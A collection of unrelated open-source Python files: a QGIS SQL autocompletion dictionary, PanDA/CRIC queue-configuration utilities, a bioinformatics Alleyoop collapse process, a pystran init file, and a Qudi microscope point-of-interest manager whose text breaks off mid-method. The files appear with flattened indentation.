# -*- coding: utf-8 -*-
"""
***************************************************************************
sql_dictionary.py
---------------------
Date : December 2015
Copyright : (C) 2015 by Hugo Mercier
Email : hugo dot mercier at oslandia dot com
***************************************************************************
* *
* This program is free software; you can redistribute it and/or modify *
* it under the terms of the GNU General Public License as published by *
* the Free Software Foundation; either version 2 of the License, or *
* (at your option) any later version. *
* *
***************************************************************************
"""
from builtins import map
__author__ = 'Hugo Mercier'
__date__ = 'December 2015'
__copyright__ = '(C) 2015, Hugo Mercier'
# This will get replaced with a git SHA1 when you do a git archive
__revision__ = '$Format:%H$'
# keywords
keywords = [
# TODO get them from a reference page
"action", "add", "after", "all", "alter", "analyze", "and", "as", "asc",
"before", "begin", "between", "by", "cascade", "case", "cast", "check",
"collate", "column", "commit", "constraint", "create", "cross", "current_date",
"current_time", "current_timestamp", "default", "deferrable", "deferred",
"delete", "desc", "distinct", "drop", "each", "else", "end", "escape",
"except", "exists", "for", "foreign", "from", "full", "group", "having",
"ignore", "immediate", "in", "initially", "inner", "insert", "intersect",
"into", "is", "isnull", "join", "key", "left", "like", "limit", "match",
"natural", "no", "not", "notnull", "null", "of", "offset", "on", "or", "order",
"outer", "primary", "references", "release", "restrict", "right", "rollback",
"row", "savepoint", "select", "set", "table", "temporary", "then", "to",
"transaction", "trigger", "union", "unique", "update", "using", "values",
"view", "when", "where",
"abort", "attach", "autoincrement", "conflict", "database", "detach",
"exclusive", "explain", "fail", "glob", "if", "index", "indexed", "instead",
"plan", "pragma", "query", "raise", "regexp", "reindex", "rename", "replace",
"temp", "vacuum", "virtual"
]
spatialite_keywords = []
# functions
functions = [
# TODO get them from a reference page
"changes", "coalesce", "glob", "ifnull", "hex", "last_insert_rowid",
"nullif", "quote", "random",
"randomblob", "replace", "round", "soundex", "total_change",
"typeof", "zeroblob", "date", "datetime", "julianday", "strftime"
]
operators = [
' AND ', ' OR ', '||', ' < ', ' <= ', ' > ', ' >= ', ' = ', ' <> ', ' IS ', ' IS NOT ', ' IN ', ' LIKE ', ' GLOB ', ' MATCH ', ' REGEXP '
]
math_functions = [
# SQL math functions
"Abs", "ACos", "ASin", "ATan", "Cos", "Cot", "Degrees", "Exp", "Floor", "Log", "Log2",
"Log10", "Pi", "Radians", "Round", "Sign", "Sin", "Sqrt", "StdDev_Pop", "StdDev_Samp", "Tan",
"Var_Pop", "Var_Samp"]
string_functions = ["Length", "Lower", "Upper", "Like", "Trim", "LTrim", "RTrim", "Replace", "Substr"]
aggregate_functions = [
"Max", "Min", "Avg", "Count", "Sum", "Group_Concat", "Total", "Var_Pop", "Var_Samp", "StdDev_Pop", "StdDev_Samp"
]
spatialite_functions = [ # from www.gaia-gis.it/spatialite-2.3.0/spatialite-sql-2.3.0.html
# SQL utility functions for BLOB objects
"*iszipblob", "*ispdfblob", "*isgifblob", "*ispngblob", "*isjpegblob", "*isexifblob",
"*isexifgpsblob", "*geomfromexifgpsblob", "MakePoint", "BuildMbr", "*buildcirclembr", "ST_MinX",
"ST_MinY", "ST_MaxX", "ST_MaxY",
# SQL functions for constructing a geometric object given its Well-known Text Representation
"ST_GeomFromText", "*pointfromtext",
# SQL functions for constructing a geometric object given its Well-known Binary Representation
"*geomfromwkb", "*pointfromwkb",
# SQL functions for obtaining the Well-known Text / Well-known Binary Representation of a geometric object
"ST_AsText", "ST_AsBinary",
# SQL functions supporting exotic geometric formats
"*assvg", "*asfgf", "*geomfromfgf",
# SQL functions on type Geometry
"ST_Dimension", "ST_GeometryType", "ST_Srid", "ST_SetSrid", "ST_isEmpty", "ST_isSimple", "ST_isValid", "ST_Boundary",
"ST_Envelope",
# SQL functions on type Point
"ST_X", "ST_Y",
# SQL functions on type Curve [Linestring or Ring]
"ST_StartPoint", "ST_EndPoint", "ST_Length", "ST_isClosed", "ST_isRing", "ST_Simplify",
"*simplifypreservetopology",
# SQL functions on type LineString
"ST_NumPoints", "ST_PointN",
# SQL functions on type Surface [Polygon or Ring]
"ST_Centroid", "ST_PointOnSurface", "ST_Area",
# SQL functions on type Polygon
"ST_ExteriorRing", "ST_InteriorRingN",
# SQL functions on type GeomCollection
"ST_NumGeometries", "ST_GeometryN",
# SQL functions that test approximate spatial relationships via MBRs
"MbrEqual", "MbrDisjoint", "MbrTouches", "MbrWithin", "MbrOverlaps", "MbrIntersects",
"MbrContains",
# SQL functions that test spatial relationships
"ST_Equals", "ST_Disjoint", "ST_Touches", "ST_Within", "ST_Overlaps", "ST_Crosses", "ST_Intersects", "ST_Contains",
"ST_Relate",
# SQL functions for distance relationships
"ST_Distance",
# SQL functions that implement spatial operators
"ST_Intersection", "ST_Difference", "ST_Union", "ST_SymDifference", "ST_Buffer", "ST_ConvexHull",
# SQL functions for coordinate transformations
"ST_Transform",
# SQL functions for Spatial-MetaData and Spatial-Index handling
"*initspatialmetadata", "*addgeometrycolumn", "*recovergeometrycolumn", "*discardgeometrycolumn",
"*createspatialindex", "*creatembrcache", "*disablespatialindex",
# SQL functions implementing FDO/OGR compatibility
"*checkspatialmetadata", "*autofdostart", "*autofdostop", "*initfdospatialmetadata",
"*addfdogeometrycolumn", "*recoverfdogeometrycolumn", "*discardfdogeometrycolumn",
# SQL functions for MbrCache-based queries
"*filtermbrwithin", "*filtermbrcontains", "*filtermbrintersects", "*buildmbrfilter"
]
qgis_functions = [
"atan2", "round", "rand", "randf", "clamp", "scale_linear", "scale_exp", "_pi", "to_int", "toint", "to_real", "toreal",
"to_string", "tostring", "to_datetime", "todatetime", "to_date", "todate", "to_time", "totime", "to_interval", "tointerval",
"regexp_match", "now", "_now", "age", "year", "month", "week", "day", "hour", "minute", "second", "day_of_week", "title",
"levenshtein", "longest_common_substring", "hamming_distance", "wordwrap", "regexp_replace", "regexp_substr", "concat",
"strpos", "_left", "_right", "rpad", "lpad", "format", "format_number", "format_date", "color_rgb", "color_rgba", "ramp_color",
"color_hsl", "color_hsla", "color_hsv", "color_hsva", "color_cmyk", "color_cmyka", "color_part", "darker", "lighter",
"set_color_part", "point_n", "start_point", "end_point", "nodes_to_points", "segments_to_lines", "make_point",
"make_point_m", "make_line", "make_polygon", "x_min", "xmin", "x_max", "xmax", "y_min", "ymin", "y_max", "ymax", "geom_from_wkt",
"geomFromWKT", "geom_from_gml", "relate", "intersects_bbox", "bbox", "translate", "buffer", "point_on_surface", "reverse",
"exterior_ring", "interior_ring_n", "geometry_n", "bounds", "num_points", "num_interior_rings", "num_rings", "num_geometries",
"bounds_width", "bounds_height", "is_closed", "convex_hull", "sym_difference", "combine", "_union", "geom_to_wkt", "geomToWKT",
"transform", "uuid", "_uuid", "layer_property", "var", "_specialcol_", "project_color"]
# constants
constants = ["null", "false", "true"]
spatialite_constants = []
def getSqlDictionary(spatial=True):
def strip_star(s):
if s[0] == '*':
return s.lower()[1:]
else:
return s.lower()
k, c, f = list(keywords), list(constants), list(functions)
if spatial:
k += spatialite_keywords
f += spatialite_functions
f += qgis_functions
c += spatialite_constants
return {'keyword': list(map(strip_star, k)), 'constant': list(map(strip_star, c)), 'function': list(map(strip_star, f))}
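# Editor's note: a minimal usage sketch, added for illustration and not part of
# the original module. getSqlDictionary() returns lower-cased, star-stripped
# name lists keyed by token class, ready for an SQL autocompleter:
#     d = getSqlDictionary(spatial=False)
#     'select' in d['keyword']    # -> True
#     'round' in d['function']    # -> True (parentheses are only appended
#                                 #    in getQueryBuilderDictionary below)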
def getQueryBuilderDictionary():
# concat functions
def ff(l):
return [s for s in l if s[0] != '*']
def add_paren(l):
return [s + "(" for s in l]
foo = sorted(add_paren(ff(list(set.union(set(functions), set(spatialite_functions), set(qgis_functions))))))
m = sorted(add_paren(ff(math_functions)))
agg = sorted(add_paren(ff(aggregate_functions)))
op = ff(operators)
s = sorted(add_paren(ff(string_functions)))
return {'function': foo, 'math': m, 'aggregate': agg, 'operator': op, 'string': s}
# === wonder-sk/QGIS :: python/plugins/db_manager/db_plugins/vlayers/sql_dictionary.py | Python | gpl-2.0 | 10,043 bytes ===
"""
Utils to get schedresources info from dedicated information system (CRIC)
"""
import urllib3
import json
import logging
from django.core.cache import cache
from core.schedresource.models import SchedconfigJson
from core.settings.config import CRIC_API_URL, DEPLOYMENT
_logger = logging.getLogger('bigpandamon')
def get_CRIC_panda_queues():
"""Get PanDA queues config from CRIC and put to cache"""
panda_queues_dict = cache.get(f'pandaQueues{DEPLOYMENT}')
if not panda_queues_dict:
panda_queues_dict = {}
url = CRIC_API_URL
http = urllib3.PoolManager()
try:
r = http.request('GET', url)
data = json.loads(r.data.decode('utf-8'))
for pq, params in data.items():
if DEPLOYMENT == 'ORACLE_ATLAS':
if 'vo_name' in params and params['vo_name'] == 'atlas':
panda_queues_dict[pq] = params
if DEPLOYMENT == 'ORACLE_DOMA':
if 'vo_name' in params and params['vo_name'] in ['osg', 'atlas']:
panda_queues_dict[pq] = params
except Exception as exc:
        print(exc)
cache.set(f'pandaQueues{DEPLOYMENT}', panda_queues_dict, 60*20)
return panda_queues_dict
def get_panda_queues():
"""
Get PanDA queues info from available sources, priority: CRIC -> SchedconfigJson table -> Schedconfig
:return: dict of PQs
"""
# try get info from CRIC
try:
panda_queues_dict = get_CRIC_panda_queues()
    except Exception:
panda_queues_dict = None
_logger.error("[JSR] cannot get json from CRIC")
if not panda_queues_dict:
# get data from new SCHEDCONFIGJSON table
panda_queues_list = []
panda_queues_dict = {}
panda_queues_list.extend(SchedconfigJson.objects.values())
if len(panda_queues_list) > 0:
for pq in panda_queues_list:
try:
panda_queues_dict[pq['pandaqueue']] = json.loads(pq['data'])
                except Exception:
panda_queues_dict[pq['pandaqueue']] = None
_logger.error("cannot load json from SCHEDCONFIGJSON table for {} PanDA queue".format(pq['pandaqueue']))
return panda_queues_dict
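# Editor's note: a hedged usage sketch, not part of the original module. The
# dict returned above is keyed by PanDA queue name; each value is the parsed
# JSON of queue parameters (or None when a SCHEDCONFIGJSON row fails to parse):
#     pqs = get_panda_queues()
#     online = [pq for pq, params in pqs.items()
#               if params and params.get('status') == 'online']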
def get_pq_atlas_sites():
"""
Get dict of PQ and corresponding ATLAS sites
:return: atlas_sites_dict: dict
"""
atlas_sites_dict = {}
pq_dict = get_panda_queues()
if pq_dict:
for pq, pqdata in pq_dict.items():
if 'atlas_site' in pqdata:
atlas_sites_dict[pq] = pqdata['atlas_site']
return atlas_sites_dict
def get_pq_resource_types():
"""
Extract resource types for PQs from CRIC PQ JSON
:return:
"""
resource_types_dict = {}
pq_dict = get_panda_queues()
if pq_dict:
for pq, pqdata in pq_dict.items():
if 'siteid' in pqdata and 'resource_type' in pqdata:
resource_types_dict[pqdata['siteid']] = pqdata['resource_type']
return resource_types_dict
def get_pq_fairshare_policy():
"""
Extract fairshare policy for PQs from CRIC PQ JSON
:return:
"""
fairshare_policy_dict = {}
pq_dict = get_panda_queues()
if pq_dict:
for pq, pqdata in pq_dict.items():
if 'siteid' in pqdata and 'fairsharepolicy' in pqdata:
fairshare_policy_dict[pqdata['siteid']] = pqdata['fairsharepolicy']
return fairshare_policy_dict
def get_panda_resource(pq_name):
"""Rerurns dict for a particular PanDA queue"""
pq_dict = get_panda_queues()
if pq_dict and pq_name in pq_dict:
return pq_dict[pq_name]
return None
url = "https://atlas-cric.cern.ch/api/atlas/pandaqueue/query/?json"
http = urllib3.PoolManager()
data = {}
try:
r = http.request('GET', url)
data = json.loads(r.data.decode('utf-8'))
for cs in data.keys():
if (data[cs] and siterec.siteid == data[cs]['siteid']):
return data[cs]['panda_resource']
except Exception as exc:
print(exc)
def get_basic_info_for_pqs(pq_list):
"""
Return list of dicts with basic info for list of PQs, including ATLAS site, region (cloud), tier, corepower, status
    If the input pq_list is empty, return info for all PQs
:param pq_list: list
:return: site_list: list
"""
pq_info_list = []
pq_info = get_panda_queues()
if len(pq_list) > 0:
for pq in pq_list:
if pq in pq_info and pq_info[pq]:
pq_info_list.append({
'pq_name': pq,
'site': pq_info[pq]['gocname'],
'region': pq_info[pq]['cloud'],
'tier': pq_info[pq]['tier'],
'corepower': pq_info[pq]['corepower'],
'status': pq_info[pq]['status'],
})
    else:
        for pq, pqdata in pq_info.items():
            pq_info_list.append({
                'pq_name': pq,
                'site': pqdata['gocname'],
                'region': pqdata['cloud'],
                'tier': pqdata['tier'],
                'corepower': pqdata['corepower'],
                'status': pqdata['status'],
            })
return pq_info_list
def get_object_stores():
object_stores_dict = cache.get('objectStores')
if not object_stores_dict:
object_stores_dict = {}
url = "https://atlas-cric.cern.ch/api/atlas/ddmendpoint/query/?json&type=OS_"
http = urllib3.PoolManager()
try:
r = http.request('GET', url)
data = json.loads(r.data.decode('utf-8'))
except Exception as exc:
_logger.exception(exc)
data = {}
for OSname, OSdescr in data.items():
if "resource" in OSdescr and "bucket_id" in OSdescr["resource"]:
object_stores_dict[OSdescr["resource"]["bucket_id"]] = {
'name': OSname,
'site': OSdescr["site"],
'region': OSdescr['cloud'],
}
object_stores_dict[OSdescr["resource"]["id"]] = {
'name': OSname,
'site': OSdescr["site"],
'region': OSdescr['cloud'],
}
object_stores_dict[OSdescr["id"]] = {
'name': OSname,
'site': OSdescr["site"],
'region': OSdescr['cloud'],
}
cache.set('objectStores', object_stores_dict, 3600)
return object_stores_dict
def getCRICSEs():
SEs = cache.get('CRIC_SEs')
if not SEs:
url = "https://atlas-cric.cern.ch/api/atlas/ddmendpoint/query/?json"
http = urllib3.PoolManager()
SEs = {}
try:
r = http.request('GET', url)
data = json.loads(r.data.decode('utf-8'))
for se in data.keys():
su = data[se].get("su", None)
if su:
SEs.setdefault(su, set()).add(se)
except Exception:
_logger.exception('Got exception on getCRICSEs')
cache.set('CRIC_SEs', SEs, 7200)
return SEs
def getCRICSites():
sitesUcore = cache.get('sitesUcore')
sitesHarvester = cache.get('sitesHarvester')
sitesType = cache.get('sitesType')
computevsAtlasCE = cache.get('computevsAtlasCE')
if not (sitesUcore and sitesHarvester and computevsAtlasCE and sitesType):
sitesUcore, sitesHarvester = [], []
computevsAtlasCE, sitesType = {}, {}
url = "https://atlas-cric.cern.ch/api/atlas/pandaqueue/query/?json"
http = urllib3.PoolManager()
data = {}
try:
r = http.request('GET', url)
data = json.loads(r.data.decode('utf-8'))
for cs in data.keys():
if 'unifiedPandaQueue' in data[cs]['catchall'] or 'ucore' in data[cs]['capability']:
sitesUcore.append(data[cs]['siteid'])
if 'harvester' in data[cs] and len(data[cs]['harvester']) != 0:
sitesHarvester.append(data[cs]['siteid'])
if 'panda_site' in data[cs]:
computevsAtlasCE[cs] = data[cs]['atlas_site']
if 'type' in data[cs]:
sitesType[cs] = data[cs]['type']
except Exception as exc:
print(exc)
cache.set('sitesUcore', sitesUcore, 3600)
cache.set('sitesHarvester', sitesHarvester, 3600)
cache.set('sitesType', sitesType, 3600)
cache.set('computevsAtlasCE', computevsAtlasCE, 3600)
return sitesUcore, sitesHarvester, sitesType, computevsAtlasCE
# === PanDAWMS/panda-bigmon-core :: core/schedresource/utils.py | Python | apache-2.0 | 8,706 bytes ===
# -*- coding: utf-8 -*-
"""
Passes through commands to the created device.
"""
from __future__ import unicode_literals, print_function
class DeviceFactory:
def __init__(self, factory):
self.factory = factory
def address(self):
return self.factory.address()
def reading(self):
return self.factory.reading()
def state(self):
return self.factory.state()
def type(self):
return self.factory.type()
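# Editor's note: a hypothetical usage sketch, added for illustration and not
# part of the original file. DeviceFactory only delegates, so any object that
# exposes address()/reading()/state()/type() can be wrapped:
#     class FakeSensor:
#         def address(self): return '0x46'
#         def reading(self): return 21.5
#         def state(self): return 'ok'
#         def type(self): return 'thermometer'
#     DeviceFactory(FakeSensor()).reading()  # -> 21.5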
# === chrisramsay/pysense :: pysense/device/device_factory.py | Python | gpl-2.0 | 462 bytes ===
"""Run Alleyoop collapse tool on Slamdunk results."""
import os
import pandas as pd
from plumbum import TEE
from resolwe.process import Cmd, DataField, FileField, StringField
from resolwe_bio.process.runtime import ProcessBio
def compute_tpm(tcount):
"""Normalize readCount column to TPM values."""
exp = pd.read_csv(
tcount,
sep="\t",
index_col="gene_name",
)
exp["rpk"] = exp.apply(lambda x: (x.readCount * 1e3 / x.length), axis=1)
rpk_sum = exp["rpk"].sum()
exp["readsTPM"] = exp.apply(lambda x: (x.rpk / rpk_sum * 1e6), axis=1)
return exp
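# Editor's note: a worked example of the TPM normalisation above, with
# illustrative numbers that are not from the original source. For two genes
# with (readCount, length) = (100, 1000) and (300, 1500):
#     rpk_1 = 100 * 1e3 / 1000 = 100.0
#     rpk_2 = 300 * 1e3 / 1500 = 200.0
#     rpk_sum = 300.0
#     TPM_1 = 100.0 / 300.0 * 1e6 ~ 333333.33
#     TPM_2 = 200.0 / 300.0 * 1e6 ~ 666666.67
# so the readsTPM column always sums to 1e6 per sample.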
class AlleyoopCollapse(ProcessBio):
"""Run Alleyoop collapse tool on Slamdunk results."""
slug = "alleyoop-collapse"
process_type = "data:alleyoop:collapse"
name = "Alleyoop collapse"
requirements = {
"expression-engine": "jinja",
"executor": {
"docker": {"image": "public.ecr.aws/s4q6j6e8/resolwebio/slamdunk:2.0.0"},
},
"resources": {
"cores": 1,
"memory": 8192,
"network": True,
},
}
entity = {
"type": "sample",
}
category = "Slamdunk"
data_name = '{{ slamdunk|sample_name|default("?") }}'
version = "1.3.0"
class Input:
"""Input fields for SlamdunkAllPaired."""
slamdunk = DataField("alignment:bam:slamdunk", label="Slamdunk results")
source = StringField(
label="Gene ID source",
default="ENSEMBL",
choices=[
("ENSEMBL", "ENSEMBL"),
("UCSC", "UCSC"),
],
)
class Output:
"""Output fields to process SlamdunkAllPaired."""
tcount = FileField(label="Count report containing SLAMSeq statistics")
species = StringField(label="Species")
build = StringField(label="Build")
def run(self, inputs, outputs):
"""Run analysis."""
basename = os.path.basename(inputs.slamdunk.output.tcount.path)
assert basename.endswith(".tsv")
name = basename[:-4]
args = [
"-o",
".",
"-t",
self.requirements.resources.cores,
]
return_code, _, _ = Cmd["alleyoop"]["collapse"][args][
inputs.slamdunk.output.tcount.path
] & TEE(retcode=None)
if return_code:
self.error("Alleyoop collapse analysis failed.")
collapsed_output = name + "_collapsed.txt"
os.rename(name + "_collapsed.csv", collapsed_output)
# normalize to TPM
tcount_tpm = compute_tpm(collapsed_output)
# Map gene symbols to feature IDs
feature_dict = {}
out_columns = [
"gene_symbol",
"length",
"readsCPM",
"readsTPM",
"conversionRate",
"Tcontent",
"coverageOnTs",
"conversionsOnTs",
"readCount",
"tcReadCount",
"multimapCount",
]
input_features = tcount_tpm.index.tolist()
features = {
"source": inputs.source,
"species": inputs.slamdunk.output.species,
"feature_id__in": input_features,
}
feature_dict = {f.feature_id: f.name for f in self.feature.filter(**features)}
tcount_tpm["gene_symbol"] = tcount_tpm.index.map(feature_dict)
tcount_tpm.to_csv(collapsed_output, columns=out_columns, sep="\t")
outputs.tcount = collapsed_output
outputs.species = inputs.slamdunk.output.species
outputs.build = inputs.slamdunk.output.build
# === genialis/resolwe-bio :: resolwe_bio/processes/slamdunk/alleyoop_collapse.py | Python | apache-2.0 | 3,626 bytes ===
# -*- coding: utf-8 -*-
"""
@author: Stijn Van Hoey
pySTAN: python STRucture ANalyst
"""
import numpy as np
import matplotlib.pyplot as plt
from evaluationfunctions import Evaluation, Likelihood
from sensitivity_base import SensitivityAnalysis
from sensitivity_dynamic import DynamicSensitivity
from sensitivity_globaloat import GlobalOATSensitivity
from sensitivity_morris import MorrisScreening
from sensitivity_regression import SRCSensitivity
from sensitivity_sobol import SobolVariance
from sensitivity_rsa import RegionalSensitivity
__version__ = "0.0.2"
if __name__ == '__main__':
    print('pySTAN: python STRucture ANalyst (Van Hoey S. 2012)')
# === stijnvanhoey/pystran :: pystran/__init__.py | Python | bsd-3-clause | 682 bytes ===
# -*- coding: utf-8 -*-
"""
This module contains a POI Manager core class which gives capability to mark
points of interest, re-optimise their position, and keep track of sample drift
over time.
Qudi is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
Qudi is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with Qudi. If not, see <http://www.gnu.org/licenses/>.
Copyright (c) the Qudi Developers. See the COPYRIGHT.txt file at the
top-level directory of this distribution and at <https://github.com/Ulm-IQO/qudi/>
"""
import logging
import math
import numpy as np
import re
import scipy.ndimage as ndimage
import scipy.ndimage.filters as filters
import time
from collections import OrderedDict
from core.module import Connector
from core.util.mutex import Mutex
from datetime import datetime
from logic.generic_logic import GenericLogic
from qtpy import QtCore
class PoI:
"""
The actual individual poi is saved in this generic object.
"""
def __init__(self, pos=None, name=None, key=None):
# Logging
self.log = logging.getLogger(__name__)
# The POI has fixed coordinates relative to the sample, enabling a map to be saved.
self._coords_in_sample = []
# The POI is at a scanner position, which may vary with time (drift). This time
# trace records every time+position when the POI position was explicitly known.
self._position_time_trace = []
# To avoid duplication while algorithmically setting POIs, we need the key string to
# go to sub-second. This requires the datetime module.
self._creation_time = datetime.now()
if key is None:
self._key = self._creation_time.strftime('poi_%Y%m%d_%H%M_%S_%f')
else:
self._key = key
if pos is not None:
if len(pos) != 3:
self.log.error('Given position does not contain 3 '
'dimensions.'
)
# Store the time in the history log as seconds since 1970,
# rather than as a datetime object.
creation_time_sec = (self._creation_time - datetime.utcfromtimestamp(0)).total_seconds()
self._position_time_trace.append(
np.array([creation_time_sec, pos[0], pos[1], pos[2]]))
if name is None:
self._name = self._creation_time.strftime('poi_%H%M%S')
else:
self._name = name
def set_coords_in_sample(self, coords=None):
'''Defines the position of the poi relative to the sample,
allowing a sample map to be constructed. Once set, these
"coordinates in sample" will not be altered unless the user wants to
manually redefine this POI (for example, they put the POI in
the wrong place).
'''
if coords is not None: # FIXME: Futurewarning fired here.
if len(coords) != 3:
self.log.error('Given position does not contain 3 '
'dimensions.'
)
self._coords_in_sample = [coords[0], coords[1], coords[2]]
def add_position_to_history(self, position=None):
""" Adds an explicitly known position+time to the history of the POI.
@param float[3] position: position coordinates of the poi
@return int: error code (0:OK, -1:error)
"""
if position is None:
position = []
if isinstance(position, (np.ndarray,)) and not position.size == 3:
return -1
elif isinstance(position, (list, tuple)) and not len(position) == 3:
return -1
else:
self._position_time_trace.append(
np.array([time.time(), position[0], position[1], position[2]]))
def get_coords_in_sample(self):
""" Returns the coordinates of the POI relative to the sample.
@return float[3]: the POI coordinates.
"""
return self._coords_in_sample
def set_name(self, name=None):
""" Sets the name of the poi.
@param string name: name to be set.
@return int: error code (0:OK, -1:error)
"""
        if self._name == 'crosshair' or self._name == 'sample':
# self.log.error('You can not change the name of the crosshair.')
return -1
if name is not None:
self._name = name
return 0
        if len(self._position_time_trace) > 0:
            self._name = self._creation_time.strftime('Point_%Y%m%d_%M%S')
            return -1
        else:
            self._name = time.strftime('Point_%Y%m%d_%M%S')
            return -1
def get_name(self):
""" Returns the name of the poi.
@return string: name
"""
return self._name
def get_key(self):
""" Returns the dictionary key of the poi.
@return string: key
"""
return self._key
def get_position_history(self): # TODO: instead of "trace": drift_log, history,
""" Returns the whole position history as array.
@return float[][4]: the whole position history
"""
return np.array(self._position_time_trace)
    def delete_last_position(self):
""" Delete the last position in the history.
@return float[4]: the position just deleted.
"""
if len(self._position_time_trace) > 0:
return self._position_time_trace.pop()
else:
return [-1., -1., -1., -1.]
class PoiManagerLogic(GenericLogic):
"""
This is the Logic class for mapping and tracking bright features in the confocal scan.
"""
_modclass = 'poimanagerlogic'
_modtype = 'logic'
# declare connectors
optimizer1 = Connector(interface='OptimizerLogic')
scannerlogic = Connector(interface='ConfocalLogic')
savelogic = Connector(interface='SaveLogic')
signal_timer_updated = QtCore.Signal()
signal_poi_updated = QtCore.Signal()
signal_poi_deleted = QtCore.Signal(str)
signal_confocal_image_updated = QtCore.Signal()
signal_periodic_opt_started = QtCore.Signal()
signal_periodic_opt_duration_changed = QtCore.Signal()
signal_periodic_opt_stopped = QtCore.Signal()
def __init__(self, config, **kwargs):
super().__init__(config=config, **kwargs)
self.roi_name = ''
self.poi_list = dict()
self._current_poi_key = None
self.go_to_crosshair_after_refocus = False # default value
# timer and its handling for the periodic refocus
self.timer = None
self.time_left = 0
self.timer_step = 0
self.timer_duration = 300
# locking for thread safety
self.threadlock = Mutex()
def on_activate(self):
""" Initialisation performed during activation of the module.
"""
self._optimizer_logic = self.get_connector('optimizer1')
self._confocal_logic = self.get_connector('scannerlogic')
self._save_logic = self.get_connector('savelogic')
        # initially add crosshair to the POIs
crosshair = PoI(pos=[0, 0, 0], name='crosshair')
crosshair._key = 'crosshair'
self.poi_list[crosshair._key] = crosshair
        # initially add sample to the POIs
sample = PoI(pos=[0, 0, 0], name='sample')
sample._key = 'sample'
self.poi_list[sample._key] = sample
# listen for the refocus to finish
self._optimizer_logic.sigRefocusFinished.connect(self._refocus_done)
# listen for the deactivation of a POI caused by moving to a different position
self._confocal_logic.signal_change_position.connect(self.user_move_deactivates_poi)
self.testing()
# Initialise the roi_map_data (xy confocal image)
self.roi_map_data = self._confocal_logic.xy_image
# A POI is active if the scanner is at that POI
self.active_poi = None
def on_deactivate(self):
return
def user_move_deactivates_poi(self, tag):
""" Deactivate the active POI if the confocal microscope scanner position is
moved by anything other than the optimizer
"""
if tag != 'optimizer':
self._deactivate_poi()
def testing(self):
""" Debug function for testing. """
pass
def add_poi(self, position=None, key=None, emit_change=True):
""" Creates a new poi and adds it to the list.
@return int: key of this new poi
A position can be provided (such as during re-loading a saved ROI).
If no position is provided, then the current crosshair position is used.
"""
# If there are only 2 POIs (sample and crosshair) then the newly added POI needs to start the sample drift logging.
if len(self.poi_list) == 2:
self.poi_list['sample']._creation_time = time.time()
self.poi_list['sample'].delete_last_position()
self.poi_list['sample'].add_position_to_history(position=[0, 0, 0])
self.poi_list['sample'].set_coords_in_sample(coords=[0, 0, 0])
if position is None:
position = self._confocal_logic.get_position()
if len(position) != 3:
self.log.error('Given position is not 3-dimensional.'
'Please pass POIManager a 3-dimensional position to set a POI.')
return
new_poi = PoI(pos=position, key=key)
self.poi_list[new_poi.get_key()] = new_poi
# The POI coordinates are set relative to the last known sample position
most_recent_sample_pos = self.poi_list['sample'].get_position_history()[-1, :][1:4]
this_poi_coords = position - most_recent_sample_pos
new_poi.set_coords_in_sample(coords=this_poi_coords)
# Since POI was created at current scanner position, it automatically
# becomes the active POI.
self.set_active_poi(poikey=new_poi.get_key())
if emit_change:
self.signal_poi_updated.emit()
return new_poi.get_key()
def get_confocal_image_data(self):
""" Get the current confocal xy scan data to hold as image of ROI"""
# get the roi_map_data (xy confocal image)
self.roi_map_data = self._confocal_logic.xy_image
self.signal_confocal_image_updated.emit()
def get_all_pois(self, abc_sort=False):
""" Returns a list of the names of all existing POIs.
@return string[]: List of names of the POIs
Also crosshair and sample are included.
"""
if abc_sort is False:
return sorted(self.poi_list.keys())
elif abc_sort is True:
# First create a dictionary with poikeys indexed against names
poinames = [''] * len(self.poi_list.keys())
for i, poikey in enumerate(self.poi_list.keys()):
poiname = self.poi_list[poikey].get_name()
poinames[i] = [poiname, poikey]
# Sort names in the way that humans expect (site1, site2, site11, etc)
# Regular expressions to make sorting key
convert = lambda text: int(text) if text.isdigit() else text
alphanum_key = lambda key: [convert(c) for c in re.split('([0-9]+)', key[0])]
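            # Illustration (editor's note): a plain lexicographic sort would
            # give ['site1', 'site11', 'site2']; this alphanumeric key yields
            # the human-expected ['site1', 'site2', 'site11'].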
# Now we can sort poinames by name and return keys in that order
return [key for [name, key] in sorted(poinames, key=alphanum_key)]
else:
# TODO: produce sensible error about unknown value of abc_sort.
self.log.debug('fix TODO!')
# TODO: Find a way to return a list of POI keys sorted in order of the POI names.
def delete_poi(self, poikey=None):
""" Completely deletes the whole given poi.
@param string poikey: the key of the poi
@return int: error code (0:OK, -1:error)
Does not delete the crosshair and sample.
"""
if poikey is not None and poikey in self.poi_list.keys():
            if poikey == 'crosshair' or poikey == 'sample':
self.log.warning('You cannot delete the crosshair or sample.')
return -1
del self.poi_list[poikey]
# If the active poi was deleted, there is no way to automatically choose
# another active POI, so we deactivate POI
if self.active_poi is not None and poikey == self.active_poi.get_key():
self._deactivate_poi()
self.signal_poi_updated.emit()
self.signal_poi_deleted.emit(poikey)
return 0
else:
self.log.error('X. The given POI ({0}) does not exist.'.format(
poikey))
return -1
def optimise_poi(self, poikey=None):
""" Starts the optimisation procedure for the given poi.
@param string poikey: the key of the poi
@return int: error code (0:OK, -1:error)
This is threaded, so it returns directly.
The function _refocus_done handles the data when the optimisation returns.
"""
if poikey is not None and poikey in self.poi_list.keys():
self.poi_list['crosshair'].add_position_to_history(position=self._confocal_logic.get_position())
self._current_poi_key = poikey
self._optimizer_logic.start_refocus(
initial_pos=self.get_poi_position(poikey=poikey),
caller_tag='poimanager')
return 0
else:
self.log.error(
'Z. The given POI ({0}) does not exist.'.format(poikey))
return -1
def go_to_poi(self, poikey=None):
""" Goes to the given poi and saves it as the current one.
@param string poikey: the key of the poi
@return int: error code (0:OK, -1:error)
"""
if poikey is not None and poikey in self.poi_list.keys():
self._current_poi_key = poikey
x, y, z = self.get_poi_position(poikey=poikey)
self._confocal_logic.set_position('poimanager', x=x, y=y, z=z)
else:
self.log.error('F. The given POI ({0}) does not exist.'.format(
poikey))
return -1
# This is now the active POI to send to save logic for naming in any saved filenames.
self.set_active_poi(poikey)
def get_poi_position(self, poikey=None):
""" Returns the current position of the given poi, calculated from the
POI coords in sample and the current sample position.
@param string poikey: the key of the poi
@return
"""
if poikey is not None and poikey in self.poi_list.keys():
poi_coords = self.poi_list[poikey].get_coords_in_sample()
sample_pos = self.poi_list['sample'].get_position_history()[-1, :][1:4]
return sample_pos + poi_coords
else:
